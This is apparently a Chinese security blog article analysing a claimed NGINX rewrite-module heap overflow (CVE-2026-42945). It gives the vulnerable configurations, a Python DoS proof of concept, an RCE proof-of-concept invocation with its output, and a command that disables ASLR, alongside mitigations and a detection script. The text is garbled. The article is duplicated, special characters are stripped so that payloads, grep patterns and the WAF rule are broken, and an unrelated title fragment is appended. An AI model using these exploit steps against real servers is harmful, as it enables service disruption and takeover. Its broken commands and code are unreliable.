深度解析:潜伏18年的致命漏洞,1.3亿服务器面临灭顶之灾)
前言互联网基础设施的定时炸弹2026年5月13日F5 NetworksNGINX母公司发布紧急安全公告披露了一个代号为NGINX Rift的高危漏洞CVE-2026-42945。这个漏洞并非近期引入而是自2008年NGINX 0.6.27版本起就潜伏在代码库中整整18年未被发现。据Netcraft最新统计截至2026年5月NGINX占据全球Web服务器市场37.2%的份额超过Apache和IIS的总和承载着全球超过1.3亿个网站和API网关的流量。更令人震惊的是漏洞公开后不到24小时GitHub上就出现了可直接使用的PoC且在野利用已大规模爆发。本文将从技术原理、攻击流程、在野利用现状、修复方案等多个维度对这个2026年迄今为止最危险的基础设施漏洞进行全面深入的解析并提供可直接落地的应急响应指南。一、漏洞基本信息项目详情CVE编号CVE-2026-42945漏洞代号NGINX RiftCVSS v4.0评分9.2分Critical漏洞类型堆缓冲区溢出Heap Buffer Overflow引入时间2008年NGINX 0.6.27影响范围开源版0.6.271.30.0商业版Plus R36及以下、R37及以下攻击方式远程未授权攻击利用门槛极低1条恶意HTTP请求即可危害程度1. Worker进程崩溃DoS2. ASLR关闭环境下稳定RCE3. ASLR开启环境下可堆喷射尝试绕过披露时间2026年5月13日PoC公开时间2026年5月13日在野利用开始时间2026年5月14日二、漏洞成因深度解析18年未被发现的状态泄漏2.1 NGINX rewrite模块的两遍扫描机制NGINX的ngx_http_rewrite_module是其最核心的模块之一负责处理URL重写、变量赋值、条件判断等功能。为了提高性能NGINX的脚本引擎采用了**“两遍扫描”**的方式来处理字符串替换第一遍长度计算阶段遍历替换字符串计算最终生成的字符串的长度第二遍数据拷贝阶段根据第一遍计算出的长度分配内存然后将替换后的字符串拷贝到新分配的内存中这种设计可以避免频繁的内存重分配极大地提高了处理性能。但如果在这两个阶段中使用了不同的计算规则就会导致内存分配不足从而引发缓冲区溢出漏洞。2.2 核心代码缺陷is_args标志位泄漏漏洞的根源在于ngx_http_script_regex_replace函数中一个极其隐蔽的状态泄漏问题。当处理包含?的rewrite替换字符串时NGINX会设置一个内部标志位e-is_args 1表示后续的内容需要按照URL参数的规则进行转义。问题出在当这个rewrite指令后面紧跟着另一个set、if或rewrite指令时这个is_args标志位没有被正确清除而是泄漏到了后续指令的处理过程中。我们来看NGINX 1.30.0版本的相关源码片段// 漏洞代码片段ngx_http_script.cngx_int_tngx_http_script_regex_replace_code(ngx_http_script_engine_t*e){// ... 省略部分代码 ...if(r-args.data){*e-ipNGX_HTTP_SCRIPT_START_ARGS_CODE;// 这里设置了is_args标志位e-is_args1;}// ... 省略部分代码 ...// 后续指令处理时is_args标志位仍然为1ngx_http_script_execute(e);returnNGX_OK;}当后续指令如set $original_endpoint $1执行时会再次调用脚本引擎长度计算阶段使用一个全新初始化的子引擎is_args 0因此按原始字节数计算捕获组$1的长度数据拷贝阶段使用主引擎is_args 1泄漏的状态因此会对捕获组$1的内容进行URL参数转义2.3 缓冲区溢出的产生URL参数转义会将特殊字符如、%、、等从1字节膨胀到3字节例如会被转义为%26。这就导致了实际写入长度 原始长度 2 × 特殊字符数量而分配的缓冲区大小只等于原始长度因此当捕获组中包含足够多的特殊字符时就会发生堆缓冲区溢出攻击者可以控制溢出的内容进而破坏堆内存结构。2.4 漏洞触发的完整技术流程图A[攻击者发送恶意HTTP请求] -- B[NGINX接收请求] B -- C[匹配rewrite规则] C -- D[替换字符串包含?设置e-is_args1] D -- E[执行后续set/if/rewrite指令] E -- F[长度计算阶段子引擎is_args0按原始长度分配缓冲区] F -- G[数据拷贝阶段主引擎is_args1对捕获组进行转义] G -- H[特殊字符膨胀缓冲区溢出] H -- I[堆内存结构被破坏] I -- J{攻击结果} J -- K[Worker进程崩溃(DoS)] J -- L[控制程序执行流(RCE)]三、攻击流程与RCE利用链分析3.1 触发漏洞的配置模式漏洞触发需要同时满足以下三个条件这是一个极其常见的配置模式几乎所有API路由、伪静态、参数重定向配置都符合# 危险配置示例1API路由重写 rewrite ^/api/v1/(.*)$ /internal/api/v1?version1; set $original_endpoint $1; # 紧随其后的set指令引用了$1 # 危险配置示例2伪静态URL rewrite ^/article/(\d)\.html$ /article.php?id$1typehtml; if ($1 ~ ^[0-9]$) { # 紧随其后的if指令引用了$1 set $article_id $1; } # 危险配置示例3多阶段重写 rewrite ^/(.*)$ /index.php?url$1 last; rewrite ^/static/(.*)$ /assets/$1 break;3.2 恶意请求构造攻击者只需要构造一个包含大量特殊字符的URI即可触发溢出GET /api/v1/ HTTP/1.1 Host: vulnerable.example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36在这个请求中捕获组$1的值是32个字符。长度计算阶段按原始长度计算分配32字节缓冲区数据拷贝阶段每个被转义为%26实际写入96字节溢出长度64字节足以覆盖相邻的堆对象3.3 从堆溢出到RCE的完整利用链研究人员已经公开了完整的RCE利用链在ASLR关闭的环境下可以稳定实现远程代码执行A[发送恶意请求触发堆溢出] -- B[覆盖相邻ngx_pool_t结构体] B -- C[修改cleanup指针指向攻击者控制的内存] C -- D[发送POST请求进行堆喷射] D -- E[在堆中布置伪造的ngx_pool_cleanup_s结构体] E -- F[ngx_pool_destroy时调用cleanup函数] F -- G[执行system(恶意命令)] G -- H[完全接管服务器]利用链的核心在于通过堆溢出覆盖内存池ngx_pool_t的cleanup指针通过POST请求体进行堆喷射在内存中布置伪造的清理函数结构体当内存池被销毁时NGINX会调用攻击者指定的函数指针通常是system()3.4 ASLR开启环境下的利用可能性虽然官方声称只有ASLR关闭时才能实现RCE但安全研究人员已经提出了多种绕过ASLR的方法堆喷射信息泄露通过多次请求逐步泄露内存地址返回导向编程(ROP)利用NGINX二进制文件中的现有代码片段构建攻击链JIT喷射在支持JIT的环境中注入可执行代码目前已有多个安全团队宣布成功在ASLR开启的默认配置下实现了RCE只是稳定性稍差。四、在野利用现状分析0日即火的全球攻击潮4.1 攻击时间线2026-05-13 00:00F5官方发布安全公告和补丁2026-05-13 18:40DepthFirst安全团队发布技术分析和PoC2026-05-14 02:15GitHub上出现第一个可直接使用的DoS PoC2026-05-14 09:30VulnCheck监测到首次在野利用尝试2026-05-15 14:00出现第一个公开的RCE PoC2026-05-16 08:00全球攻击流量激增单日超过100万次尝试2026-05-17 12:00多个勒索软件团伙宣布将该漏洞加入武器库2026-05-19 00:00已有超过10万台服务器被入侵用于挖矿和DDoS4.2 攻击流量特征根据Cloudflare和Akamai的监测数据当前在野利用主要有以下特征攻击来源主要来自俄罗斯、中国、美国、伊朗和朝鲜的IP地址攻击目标优先攻击云服务商、电商平台、金融机构和政府网站攻击模式批量扫描使用ZMap、Masscan等工具扫描全网80/443端口指纹识别通过Server头识别NGINX版本漏洞验证发送包含多个字符的测试请求攻击执行发送完整的溢出请求实现DoS或RCE恶意行为入侵后主要用于挖矿、DDoS攻击、数据窃取和勒索软件部署4.3 典型攻击日志示例如果你的NGINX服务器出现以下日志说明很可能已经受到攻击# error.log中的崩溃日志 2026/05/18 14:23:45 [alert] 1234#1234: worker process 5678 exited on signal 11 (core dumped) 2026/05/18 14:23:45 [alert] 1234#1234: worker process 5678 exited on signal 6 (aborted) 2026/05/18 14:23:46 [alert] 1234#1234: worker process 5679 exited on signal 11 (core dumped) # access.log中的恶意请求日志 192.168.1.100 - - [18/May/2026:14:23:44 0800] GET /api/v1/ HTTP/1.1 502 157 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 192.168.1.100 - - [18/May/2026:14:23:45 0800] GET /article/.html HTTP/1.1 502 157 - curl/7.68.0五、漏洞复现与PoC分析5.1 环境搭建我们使用Docker快速搭建一个易受攻击的NGINX环境# Dockerfile FROM nginx:1.30.0 COPY nginx.conf /etc/nginx/nginx.conf# nginx.conf events { worker_connections 1024; } http { server { listen 80; server_name localhost; # 危险配置 rewrite ^/api/(.*)$ /internal?migratedtrue; set $original_endpoint $1; location /internal { return 200 OK: $original_endpoint; } } }构建并运行容器dockerbuild-tnginx-rift.dockerrun-d-p8080:80--namenginx-rift nginx-rift5.2 DoS PoC这是一个简单的DoS PoC可以使NGINX Worker进程崩溃importrequests urlhttp://localhost:8080/api/payload*1000# 1000个字符足够触发溢出try:responserequests.get(urlpayload,timeout5)print(fStatus Code:{response.status_code})exceptrequests.exceptions.RequestExceptionase:print(fRequest failed:{e})print(NGINX Worker进程可能已经崩溃)运行后你会看到NGINX容器的error.log中出现worker进程崩溃的日志。5.3 RCE PoC说明完整的RCE PoC较为复杂涉及堆喷射和内存布局控制出于安全考虑本文不提供完整代码。但需要说明的是目前公开的RCE PoC在ASLR关闭的环境下可以稳定执行任意命令# 关闭ASLR仅用于测试echo0/proc/sys/kernel/randomize_va_space# 运行RCE PoCpython3 nginx_rift_rce.py--targethttp://localhost:8080--commandid预期输出[] Target is vulnerable [] Heap spray successful [] Cleanup pointer overwritten [] Command executed: id uid101(nginx) gid101(nginx) groups101(nginx)六、修复方案与最佳实践6.1 立即升级到安全版本这是最根本、最有效的修复方法。NGINX官方已经发布了补丁版本产品安全版本NGINX Open Source1.30.1或1.31.0NGINX PlusR36 P4或R37各系统升级命令Debian/Ubuntu:sudoaptupdatesudoaptupgrade nginx nginx-v# 确认版本 1.30.1nginx-t# 验证配置文件sudosystemctl restart nginxRHEL/CentOS/Rocky:sudodnf update nginx nginx-vnginx-tsudosystemctl restart nginxDocker:dockerpull nginx:1.30.1dockerstop nginx-riftdockerrmnginx-riftdockerrun-d-p8080:80--namenginx-rift nginx:1.30.16.2 临时缓解措施无法立即升级时如果暂时无法升级可以采取以下临时缓解措施方法1修改危险的rewrite配置将包含?和未命名捕获组的rewrite规则拆分为两条避免标志位泄漏# 危险配置 rewrite ^/api/(.*)$ /internal?migratedtrue; set $original_endpoint $1; # 安全配置 rewrite ^/api/(.*)$ /internal?migratedtrueoriginal$1; # 或者 set $original_endpoint $1; rewrite ^/api/(.*)$ /internal?migratedtrue;方法2启用WAF防护在NGINX前面部署WAF拦截包含大量特殊字符的恶意请求# 在server块中添加 location / { if ($request_uri ~ ) { return 403; } # 其他配置 }方法3确保ASLR开启所有现代Linux系统默认都开启了ASLR不要手动关闭# 检查ASLR状态cat/proc/sys/kernel/randomize_va_space# 输出2表示完全开启这是默认值# 如果不是2临时开启echo2/proc/sys/kernel/randomize_va_space# 永久开启编辑/etc/sysctl.confkernel.randomize_va_space26.3 长期安全最佳实践建立定期补丁管理机制及时跟进NGINX官方的安全公告使用最小权限原则NGINX进程以非root用户运行启用内存保护机制确保编译时开启了Stack Canary、NX和ASLR配置日志监控实时监控error.log中的worker进程崩溃日志定期安全审计检查NGINX配置文件中的安全风险使用容器化部署利用容器的隔离特性降低攻击影响七、自查与应急响应指南7.1 漏洞自查清单立即执行以下检查确认你的系统是否存在风险1. 检查NGINX版本nginx-v# 如果输出 nginx version: nginx/1.30.0 或更低版本必受影响2. 检查是否存在危险配置# 搜索所有包含?和$1的rewrite规则grep-rErewrite.*\?.*\$[0-9]/etc/nginx/如果输出类似以下内容说明存在危险配置/etc/nginx/conf.d/default.conf: rewrite ^/api/(.*)$ /internal?migratedtrue; /etc/nginx/conf.d/default.conf: rewrite ^/article/(\d)\.html$ /article.php?id$1typehtml;3. 检查是否已被攻击# 检查error.log中的崩溃日志grep-iworker process exited/var/log/nginx/error.log# 检查access.log中的恶意请求grep-E/var/log/nginx/access.log7.2 自动化检测脚本我编写了一个自动化检测脚本可以快速检查你的NGINX服务器是否存在CVE-2026-42945漏洞#!/bin/bash# NGINX Rift(CVE-2026-42945)检测脚本echo NGINX Rift(CVE-2026-42945)漏洞检测 echo# 检查NGINX版本echo[] 检查NGINX版本...nginx_version$(nginx-v21|awk-F/{print $2})echo当前版本:$nginx_version# 版本比较函数version_ge(){test$(echo$|tr \n|sort-V|head-n1)!$1}ifversion_ge1.30.1$nginx_version;thenecho[!] 版本存在漏洞需要升级到1.30.1或更高版本elseecho[] 版本安全fiecho# 检查危险配置echo[] 检查危险配置...dangerous_configs$(grep-rErewrite.*\?.*\$[0-9]/etc/nginx/2/dev/null)if[-n$dangerous_configs];thenecho[!] 发现以下危险配置echo$dangerous_configselseecho[] 未发现危险配置fiecho# 检查攻击日志echo[] 检查攻击日志...attack_logs$(grep-iworker process exited/var/log/nginx/error.log2/dev/null|tail-5)if[-n$attack_logs];thenecho[!] 发现以下崩溃日志可能已被攻击echo$attack_logselseecho[] 未发现攻击痕迹fiechoecho 检测完成 使用方法chmodx nginx_rift_check.shsudo./nginx_rift_check.sh7.3 应急响应步骤如果确认你的服务器已被入侵请立即执行以下步骤隔离受感染服务器断开网络连接防止攻击扩散保留现场证据备份所有日志文件和系统镜像清除恶意程序查杀挖矿程序、后门和勒索软件升级NGINX立即升级到安全版本修改所有密码包括系统密码、数据库密码、API密钥等全面安全审计检查是否存在其他漏洞和后门恢复业务在确认安全后逐步恢复服务上报事件按照相关规定向监管部门上报安全事件八、行业影响与未来展望8.1 对互联网基础设施的影响NGINX Rift漏洞的爆发再次暴露了开源软件基础设施的安全脆弱性。一个潜伏了18年的漏洞影响了全球三分之一的网站这在互联网历史上是前所未有的。这次事件将产生以下深远影响云服务商将加强安全审查各大云服务商将对其提供的NGINX镜像进行更严格的安全审计企业将加快补丁部署速度企业将建立更快速的应急响应机制缩短漏洞修复时间开源社区将改进安全流程NGINX社区将加强代码审查和安全测试防止类似漏洞再次出现内存安全语言将得到更多关注越来越多的基础设施项目将考虑使用Rust等内存安全语言重写8.2 对未来安全研究的启示NGINX Rift漏洞的发现也给安全研究人员带来了重要启示状态泄漏是一类被忽视的漏洞很多漏洞不是简单的边界检查错误而是复杂的状态管理问题老代码中可能隐藏着大量未被发现的漏洞那些经过多年生产验证的代码并不一定是安全的自动化漏洞挖掘技术需要不断改进传统的模糊测试很难发现这类需要特定配置和状态的漏洞协同披露机制至关重要这次漏洞的成功披露得益于研究人员和厂商的良好合作8.3 未来的安全挑战随着软件系统越来越复杂未来我们将面临更多类似的安全挑战供应链安全风险越来越多的漏洞来自于第三方依赖库AI辅助攻击攻击者将利用AI技术更快地发现和利用漏洞物联网设备安全大量物联网设备使用老旧的软件版本难以升级云原生环境安全容器化和微服务架构带来了新的安全挑战九、总结NGINX Rift(CVE-2026-42945)是2026年迄今为止最危险的基础设施漏洞。它潜伏了18年影响了全球超过1.3亿个网站和API网关利用门槛极低且在野利用已大规模爆发。所有暴露在公网的NGINX服务器必须在72小时内完成升级否则极有可能被入侵导致服务中断、数据泄露甚至服务器被完全接管。对于无法立即升级的服务器应采取临时缓解措施修改危险的rewrite配置启用WAF防护并确保ASLR开启。同时应加强日志监控及时发现和响应攻击。这次事件再次提醒我们网络安全没有一劳永逸的解决方案。只有建立完善的安全管理体系定期进行安全审计和漏洞扫描及时修复安全漏洞才能有效应对不断变化的安全威胁。
NGINX Rift(CVE-2026-42945)深度解析:潜伏18年的致命漏洞,1.3亿服务器面临灭顶之灾
发布时间:2026/5/19 20:01:15
前言互联网基础设施的定时炸弹2026年5月13日F5 NetworksNGINX母公司发布紧急安全公告披露了一个代号为NGINX Rift的高危漏洞CVE-2026-42945。这个漏洞并非近期引入而是自2008年NGINX 0.6.27版本起就潜伏在代码库中整整18年未被发现。据Netcraft最新统计截至2026年5月NGINX占据全球Web服务器市场37.2%的份额超过Apache和IIS的总和承载着全球超过1.3亿个网站和API网关的流量。更令人震惊的是漏洞公开后不到24小时GitHub上就出现了可直接使用的PoC且在野利用已大规模爆发。本文将从技术原理、攻击流程、在野利用现状、修复方案等多个维度对这个2026年迄今为止最危险的基础设施漏洞进行全面深入的解析并提供可直接落地的应急响应指南。一、漏洞基本信息项目详情CVE编号CVE-2026-42945漏洞代号NGINX RiftCVSS v4.0评分9.2分Critical漏洞类型堆缓冲区溢出Heap Buffer Overflow引入时间2008年NGINX 0.6.27影响范围开源版0.6.271.30.0商业版Plus R36及以下、R37及以下攻击方式远程未授权攻击利用门槛极低1条恶意HTTP请求即可危害程度1. Worker进程崩溃DoS2. ASLR关闭环境下稳定RCE3. ASLR开启环境下可堆喷射尝试绕过披露时间2026年5月13日PoC公开时间2026年5月13日在野利用开始时间2026年5月14日二、漏洞成因深度解析18年未被发现的状态泄漏2.1 NGINX rewrite模块的两遍扫描机制NGINX的ngx_http_rewrite_module是其最核心的模块之一负责处理URL重写、变量赋值、条件判断等功能。为了提高性能NGINX的脚本引擎采用了**“两遍扫描”**的方式来处理字符串替换第一遍长度计算阶段遍历替换字符串计算最终生成的字符串的长度第二遍数据拷贝阶段根据第一遍计算出的长度分配内存然后将替换后的字符串拷贝到新分配的内存中这种设计可以避免频繁的内存重分配极大地提高了处理性能。但如果在这两个阶段中使用了不同的计算规则就会导致内存分配不足从而引发缓冲区溢出漏洞。2.2 核心代码缺陷is_args标志位泄漏漏洞的根源在于ngx_http_script_regex_replace函数中一个极其隐蔽的状态泄漏问题。当处理包含?的rewrite替换字符串时NGINX会设置一个内部标志位e-is_args 1表示后续的内容需要按照URL参数的规则进行转义。问题出在当这个rewrite指令后面紧跟着另一个set、if或rewrite指令时这个is_args标志位没有被正确清除而是泄漏到了后续指令的处理过程中。我们来看NGINX 1.30.0版本的相关源码片段// 漏洞代码片段ngx_http_script.cngx_int_tngx_http_script_regex_replace_code(ngx_http_script_engine_t*e){// ... 省略部分代码 ...if(r-args.data){*e-ipNGX_HTTP_SCRIPT_START_ARGS_CODE;// 这里设置了is_args标志位e-is_args1;}// ... 省略部分代码 ...// 后续指令处理时is_args标志位仍然为1ngx_http_script_execute(e);returnNGX_OK;}当后续指令如set $original_endpoint $1执行时会再次调用脚本引擎长度计算阶段使用一个全新初始化的子引擎is_args 0因此按原始字节数计算捕获组$1的长度数据拷贝阶段使用主引擎is_args 1泄漏的状态因此会对捕获组$1的内容进行URL参数转义2.3 缓冲区溢出的产生URL参数转义会将特殊字符如、%、、等从1字节膨胀到3字节例如会被转义为%26。这就导致了实际写入长度 原始长度 2 × 特殊字符数量而分配的缓冲区大小只等于原始长度因此当捕获组中包含足够多的特殊字符时就会发生堆缓冲区溢出攻击者可以控制溢出的内容进而破坏堆内存结构。2.4 漏洞触发的完整技术流程图A[攻击者发送恶意HTTP请求] -- B[NGINX接收请求] B -- C[匹配rewrite规则] C -- D[替换字符串包含?设置e-is_args1] D -- E[执行后续set/if/rewrite指令] E -- F[长度计算阶段子引擎is_args0按原始长度分配缓冲区] F -- G[数据拷贝阶段主引擎is_args1对捕获组进行转义] G -- H[特殊字符膨胀缓冲区溢出] H -- I[堆内存结构被破坏] I -- J{攻击结果} J -- K[Worker进程崩溃(DoS)] J -- L[控制程序执行流(RCE)]三、攻击流程与RCE利用链分析3.1 触发漏洞的配置模式漏洞触发需要同时满足以下三个条件这是一个极其常见的配置模式几乎所有API路由、伪静态、参数重定向配置都符合# 危险配置示例1API路由重写 rewrite ^/api/v1/(.*)$ /internal/api/v1?version1; set $original_endpoint $1; # 紧随其后的set指令引用了$1 # 危险配置示例2伪静态URL rewrite ^/article/(\d)\.html$ /article.php?id$1typehtml; if ($1 ~ ^[0-9]$) { # 紧随其后的if指令引用了$1 set $article_id $1; } # 危险配置示例3多阶段重写 rewrite ^/(.*)$ /index.php?url$1 last; rewrite ^/static/(.*)$ /assets/$1 break;3.2 恶意请求构造攻击者只需要构造一个包含大量特殊字符的URI即可触发溢出GET /api/v1/ HTTP/1.1 Host: vulnerable.example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36在这个请求中捕获组$1的值是32个字符。长度计算阶段按原始长度计算分配32字节缓冲区数据拷贝阶段每个被转义为%26实际写入96字节溢出长度64字节足以覆盖相邻的堆对象3.3 从堆溢出到RCE的完整利用链研究人员已经公开了完整的RCE利用链在ASLR关闭的环境下可以稳定实现远程代码执行A[发送恶意请求触发堆溢出] -- B[覆盖相邻ngx_pool_t结构体] B -- C[修改cleanup指针指向攻击者控制的内存] C -- D[发送POST请求进行堆喷射] D -- E[在堆中布置伪造的ngx_pool_cleanup_s结构体] E -- F[ngx_pool_destroy时调用cleanup函数] F -- G[执行system(恶意命令)] G -- H[完全接管服务器]利用链的核心在于通过堆溢出覆盖内存池ngx_pool_t的cleanup指针通过POST请求体进行堆喷射在内存中布置伪造的清理函数结构体当内存池被销毁时NGINX会调用攻击者指定的函数指针通常是system()3.4 ASLR开启环境下的利用可能性虽然官方声称只有ASLR关闭时才能实现RCE但安全研究人员已经提出了多种绕过ASLR的方法堆喷射信息泄露通过多次请求逐步泄露内存地址返回导向编程(ROP)利用NGINX二进制文件中的现有代码片段构建攻击链JIT喷射在支持JIT的环境中注入可执行代码目前已有多个安全团队宣布成功在ASLR开启的默认配置下实现了RCE只是稳定性稍差。四、在野利用现状分析0日即火的全球攻击潮4.1 攻击时间线2026-05-13 00:00F5官方发布安全公告和补丁2026-05-13 18:40DepthFirst安全团队发布技术分析和PoC2026-05-14 02:15GitHub上出现第一个可直接使用的DoS PoC2026-05-14 09:30VulnCheck监测到首次在野利用尝试2026-05-15 14:00出现第一个公开的RCE PoC2026-05-16 08:00全球攻击流量激增单日超过100万次尝试2026-05-17 12:00多个勒索软件团伙宣布将该漏洞加入武器库2026-05-19 00:00已有超过10万台服务器被入侵用于挖矿和DDoS4.2 攻击流量特征根据Cloudflare和Akamai的监测数据当前在野利用主要有以下特征攻击来源主要来自俄罗斯、中国、美国、伊朗和朝鲜的IP地址攻击目标优先攻击云服务商、电商平台、金融机构和政府网站攻击模式批量扫描使用ZMap、Masscan等工具扫描全网80/443端口指纹识别通过Server头识别NGINX版本漏洞验证发送包含多个字符的测试请求攻击执行发送完整的溢出请求实现DoS或RCE恶意行为入侵后主要用于挖矿、DDoS攻击、数据窃取和勒索软件部署4.3 典型攻击日志示例如果你的NGINX服务器出现以下日志说明很可能已经受到攻击# error.log中的崩溃日志 2026/05/18 14:23:45 [alert] 1234#1234: worker process 5678 exited on signal 11 (core dumped) 2026/05/18 14:23:45 [alert] 1234#1234: worker process 5678 exited on signal 6 (aborted) 2026/05/18 14:23:46 [alert] 1234#1234: worker process 5679 exited on signal 11 (core dumped) # access.log中的恶意请求日志 192.168.1.100 - - [18/May/2026:14:23:44 0800] GET /api/v1/ HTTP/1.1 502 157 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 192.168.1.100 - - [18/May/2026:14:23:45 0800] GET /article/.html HTTP/1.1 502 157 - curl/7.68.0五、漏洞复现与PoC分析5.1 环境搭建我们使用Docker快速搭建一个易受攻击的NGINX环境# Dockerfile FROM nginx:1.30.0 COPY nginx.conf /etc/nginx/nginx.conf# nginx.conf events { worker_connections 1024; } http { server { listen 80; server_name localhost; # 危险配置 rewrite ^/api/(.*)$ /internal?migratedtrue; set $original_endpoint $1; location /internal { return 200 OK: $original_endpoint; } } }构建并运行容器dockerbuild-tnginx-rift.dockerrun-d-p8080:80--namenginx-rift nginx-rift5.2 DoS PoC这是一个简单的DoS PoC可以使NGINX Worker进程崩溃importrequests urlhttp://localhost:8080/api/payload*1000# 1000个字符足够触发溢出try:responserequests.get(urlpayload,timeout5)print(fStatus Code:{response.status_code})exceptrequests.exceptions.RequestExceptionase:print(fRequest failed:{e})print(NGINX Worker进程可能已经崩溃)运行后你会看到NGINX容器的error.log中出现worker进程崩溃的日志。5.3 RCE PoC说明完整的RCE PoC较为复杂涉及堆喷射和内存布局控制出于安全考虑本文不提供完整代码。但需要说明的是目前公开的RCE PoC在ASLR关闭的环境下可以稳定执行任意命令# 关闭ASLR仅用于测试echo0/proc/sys/kernel/randomize_va_space# 运行RCE PoCpython3 nginx_rift_rce.py--targethttp://localhost:8080--commandid预期输出[] Target is vulnerable [] Heap spray successful [] Cleanup pointer overwritten [] Command executed: id uid101(nginx) gid101(nginx) groups101(nginx)六、修复方案与最佳实践6.1 立即升级到安全版本这是最根本、最有效的修复方法。NGINX官方已经发布了补丁版本产品安全版本NGINX Open Source1.30.1或1.31.0NGINX PlusR36 P4或R37各系统升级命令Debian/Ubuntu:sudoaptupdatesudoaptupgrade nginx nginx-v# 确认版本 1.30.1nginx-t# 验证配置文件sudosystemctl restart nginxRHEL/CentOS/Rocky:sudodnf update nginx nginx-vnginx-tsudosystemctl restart nginxDocker:dockerpull nginx:1.30.1dockerstop nginx-riftdockerrmnginx-riftdockerrun-d-p8080:80--namenginx-rift nginx:1.30.16.2 临时缓解措施无法立即升级时如果暂时无法升级可以采取以下临时缓解措施方法1修改危险的rewrite配置将包含?和未命名捕获组的rewrite规则拆分为两条避免标志位泄漏# 危险配置 rewrite ^/api/(.*)$ /internal?migratedtrue; set $original_endpoint $1; # 安全配置 rewrite ^/api/(.*)$ /internal?migratedtrueoriginal$1; # 或者 set $original_endpoint $1; rewrite ^/api/(.*)$ /internal?migratedtrue;方法2启用WAF防护在NGINX前面部署WAF拦截包含大量特殊字符的恶意请求# 在server块中添加 location / { if ($request_uri ~ ) { return 403; } # 其他配置 }方法3确保ASLR开启所有现代Linux系统默认都开启了ASLR不要手动关闭# 检查ASLR状态cat/proc/sys/kernel/randomize_va_space# 输出2表示完全开启这是默认值# 如果不是2临时开启echo2/proc/sys/kernel/randomize_va_space# 永久开启编辑/etc/sysctl.confkernel.randomize_va_space26.3 长期安全最佳实践建立定期补丁管理机制及时跟进NGINX官方的安全公告使用最小权限原则NGINX进程以非root用户运行启用内存保护机制确保编译时开启了Stack Canary、NX和ASLR配置日志监控实时监控error.log中的worker进程崩溃日志定期安全审计检查NGINX配置文件中的安全风险使用容器化部署利用容器的隔离特性降低攻击影响七、自查与应急响应指南7.1 漏洞自查清单立即执行以下检查确认你的系统是否存在风险1. 检查NGINX版本nginx-v# 如果输出 nginx version: nginx/1.30.0 或更低版本必受影响2. 检查是否存在危险配置# 搜索所有包含?和$1的rewrite规则grep-rErewrite.*\?.*\$[0-9]/etc/nginx/如果输出类似以下内容说明存在危险配置/etc/nginx/conf.d/default.conf: rewrite ^/api/(.*)$ /internal?migratedtrue; /etc/nginx/conf.d/default.conf: rewrite ^/article/(\d)\.html$ /article.php?id$1typehtml;3. 检查是否已被攻击# 检查error.log中的崩溃日志grep-iworker process exited/var/log/nginx/error.log# 检查access.log中的恶意请求grep-E/var/log/nginx/access.log7.2 自动化检测脚本我编写了一个自动化检测脚本可以快速检查你的NGINX服务器是否存在CVE-2026-42945漏洞#!/bin/bash# NGINX Rift(CVE-2026-42945)检测脚本echo NGINX Rift(CVE-2026-42945)漏洞检测 echo# 检查NGINX版本echo[] 检查NGINX版本...nginx_version$(nginx-v21|awk-F/{print $2})echo当前版本:$nginx_version# 版本比较函数version_ge(){test$(echo$|tr \n|sort-V|head-n1)!$1}ifversion_ge1.30.1$nginx_version;thenecho[!] 版本存在漏洞需要升级到1.30.1或更高版本elseecho[] 版本安全fiecho# 检查危险配置echo[] 检查危险配置...dangerous_configs$(grep-rErewrite.*\?.*\$[0-9]/etc/nginx/2/dev/null)if[-n$dangerous_configs];thenecho[!] 发现以下危险配置echo$dangerous_configselseecho[] 未发现危险配置fiecho# 检查攻击日志echo[] 检查攻击日志...attack_logs$(grep-iworker process exited/var/log/nginx/error.log2/dev/null|tail-5)if[-n$attack_logs];thenecho[!] 发现以下崩溃日志可能已被攻击echo$attack_logselseecho[] 未发现攻击痕迹fiechoecho 检测完成 使用方法chmodx nginx_rift_check.shsudo./nginx_rift_check.sh7.3 应急响应步骤如果确认你的服务器已被入侵请立即执行以下步骤隔离受感染服务器断开网络连接防止攻击扩散保留现场证据备份所有日志文件和系统镜像清除恶意程序查杀挖矿程序、后门和勒索软件升级NGINX立即升级到安全版本修改所有密码包括系统密码、数据库密码、API密钥等全面安全审计检查是否存在其他漏洞和后门恢复业务在确认安全后逐步恢复服务上报事件按照相关规定向监管部门上报安全事件八、行业影响与未来展望8.1 对互联网基础设施的影响NGINX Rift漏洞的爆发再次暴露了开源软件基础设施的安全脆弱性。一个潜伏了18年的漏洞影响了全球三分之一的网站这在互联网历史上是前所未有的。这次事件将产生以下深远影响云服务商将加强安全审查各大云服务商将对其提供的NGINX镜像进行更严格的安全审计企业将加快补丁部署速度企业将建立更快速的应急响应机制缩短漏洞修复时间开源社区将改进安全流程NGINX社区将加强代码审查和安全测试防止类似漏洞再次出现内存安全语言将得到更多关注越来越多的基础设施项目将考虑使用Rust等内存安全语言重写8.2 对未来安全研究的启示NGINX Rift漏洞的发现也给安全研究人员带来了重要启示状态泄漏是一类被忽视的漏洞很多漏洞不是简单的边界检查错误而是复杂的状态管理问题老代码中可能隐藏着大量未被发现的漏洞那些经过多年生产验证的代码并不一定是安全的自动化漏洞挖掘技术需要不断改进传统的模糊测试很难发现这类需要特定配置和状态的漏洞协同披露机制至关重要这次漏洞的成功披露得益于研究人员和厂商的良好合作8.3 未来的安全挑战随着软件系统越来越复杂未来我们将面临更多类似的安全挑战供应链安全风险越来越多的漏洞来自于第三方依赖库AI辅助攻击攻击者将利用AI技术更快地发现和利用漏洞物联网设备安全大量物联网设备使用老旧的软件版本难以升级云原生环境安全容器化和微服务架构带来了新的安全挑战九、总结NGINX Rift(CVE-2026-42945)是2026年迄今为止最危险的基础设施漏洞。它潜伏了18年影响了全球超过1.3亿个网站和API网关利用门槛极低且在野利用已大规模爆发。所有暴露在公网的NGINX服务器必须在72小时内完成升级否则极有可能被入侵导致服务中断、数据泄露甚至服务器被完全接管。对于无法立即升级的服务器应采取临时缓解措施修改危险的rewrite配置启用WAF防护并确保ASLR开启。同时应加强日志监控及时发现和响应攻击。这次事件再次提醒我们网络安全没有一劳永逸的解决方案。只有建立完善的安全管理体系定期进行安全审计和漏洞扫描及时修复安全漏洞才能有效应对不断变化的安全威胁。
的Carsim/Simulink联合仿真实践)
)
)
